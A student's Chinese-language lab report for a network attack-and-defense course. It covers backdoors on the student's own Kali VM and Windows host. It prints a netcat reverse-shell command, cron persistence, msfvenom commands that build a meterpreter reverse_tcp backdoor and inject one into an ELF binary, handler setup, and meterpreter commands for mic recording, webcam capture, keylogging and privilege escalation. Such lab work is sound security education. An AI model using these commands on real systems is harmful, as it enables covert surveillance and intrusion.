# 20232429 马成栋 2025-2026-1 《网络与系统攻防技术》实验二实验报告
1.实验内容
掌握后门原理及免杀技术
回答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
通过一些恶意链接,在用户点击进去之后就给系统自动安装后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
在注册表里面设置为开机自启动
(3)Meterpreter有哪些给你映像深刻的功能?
几行命令就可以把我的麦克风、摄像头、屏幕和硬盘里面的文件全部调出来使用,非常强大,也非常危险
(4)如何发现自己有系统有没有被安装后门?
定期用杀毒软件排查电脑是不是有一些恶意启动的.exe程序,加强防火墙防护,注意防火墙提示信息
2.实验过程
1.1关闭所有防火墙
- 如图所示关闭所有防火墙


1.2主机监听虚拟机获得shell
- 在自己的win11上得到当前ip地址为192.168.1.108

- 主机启动ncat监听2429端口

- 在另一个终端中查看端口2429的监听情况

发现监听成功
- 在虚拟机中输入命令
nc 192.168.1.108 2429 -e /bin/sh

可以发现主机成功获得了虚拟机的shell,查看到了当前目录/root中有文件夹20232429
1.3启动定时任务
- 修改cron表,用第二个
/usr/bin/vim.basic进行修改

修改成功结果如图

1.4修改定时任务
- 由于没有点明要生成的内容写在哪里,对定时任务进行修改,进一步完善定时任务

修改后,每隔两分钟就会在20232429文件夹的1.log文件中输出20232429's homework
- 修改之后的效果如图

用cat命令就可以看到1.log文件中输出了20232429's homework。
2.1使用socat获取主机的Shell
- 下载安装好socat之后,启动并且成功链接虚拟机

- 在socat里面设置win11将执行的定时任务

- 设置好之后定时20:15:59发送程序,可以看到日志里定时计划发送成功了、


3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
3.1生成一个后门程序
如图所示,使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=2429 -f exe > backdoor20232429.exe命令生成一个后门程序backdoor20232429.exe,为攻击者提供远程控制会话

注意此处LHOST后面的地址是虚拟机的ip地址,不是主机的ip地址
3.2将生成的后门程序传给主机
- 使用命令生成的后门程序在
/root/home/kali/Desktop/20232429mcd文件夹里,直接将其拖入E盘中

3.3在虚拟机SHELL中输入如图命令尝试启动监视器
在终端里输入msfconsole,进入Metasploit的控制台,依次输入如下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.79.131
set LPORT 2429
exploit
- 输入命令之后如图

- 在主机powershell中输入
./backdooe20232429启动后门程序 - 现在环境都准备就绪,可以开始攻击和尝试提权
4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
4.1开始攻击
- 在启动好后门程序之后,回到虚拟机的shell中,输入dir得到E盘里面的目录如图:

输入以下的命令,进行攻击,分别为
- 1录音
record_mic - 2获取当前主机屏幕的画面保存为截屏
screenshot - 3使用摄像头拍摄图片
webcam_snap - 4捕获键盘输入
keyscan_start - 5停止捕获
keyscan_stop - 6输出主机键盘上的缓存,记录在shell上
keyscan_dump
我的键盘输入、保存截屏、输入按键有一些问题超时,未能正确输出
结果如图


4.2尝试提权
- 通过命令getuid查看用户名,通过命令getsystem尝试提权,但是我的失败了


5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
5.1注入后门
- 通过命令msfvenom -p linux/x86/meterpreter/reverse tcp LHOST=192.168.79.131 LPORT=2429 -x /home/kali/Desktop/20232429mcd/pwn1 -f elf > 20232429_pwn2025,

- 通过命令sudo chmod a+x 20232429_pwn2025增加权限
5.2再次监听
- 另起一个shell,输入msfconsole,准备监听
输入
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.79.131
set LPORT 2429
在原来的shell里面输入./20232429pwn_2025

- 最后发现成功监听。
3.问题及解决方案
- 问题1:nc传输的backdoor20232429无法使用
- 问题1解决方案:可能是因为存储在root文件夹里面,导致传输过来是不完整的?最终是在桌面也就是root/home/kali/Desktop/20232429mcd里面重新生成,然后直接借助VMtools拖到E盘里解决
- 问题2:kali虚拟机鼠标图标消失,但是功能还能用
- 问题2解决方案:尝试过重新安装虚拟机,但是只要系统更新就会导致鼠标消失,最后原因是kali内核驱动较旧,最新更新不兼容,调低kali版本就可以解决
- 问题3:在执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=2429 -f exe > backdoor20232429.exe命令生成一个后门程序backdoor20232429.exe时,把kali虚拟机地址填成主机IP地址了,导致监视器一直无法正常启动 - 问题3解决方法:填入正确ip地址后顺利进行。
4.学习感悟、思考等
- 这次的实验让我对网络攻防有了新的认识,meterpreter竟然可以用监听的端口号和ip轻松获取一台主机上的信息,可见防火墙和杀毒对于我们的电脑安全是多么的重要,同时,解决棘手的鼠标消失问题也让我的解决问题能力得到了提升,在解决问题的过程中学到了很多的知识。我要继续努力学习专业知识,成为一名网络空间安全人才,为网络安全做贡献。
浙公网安备 33010602011771号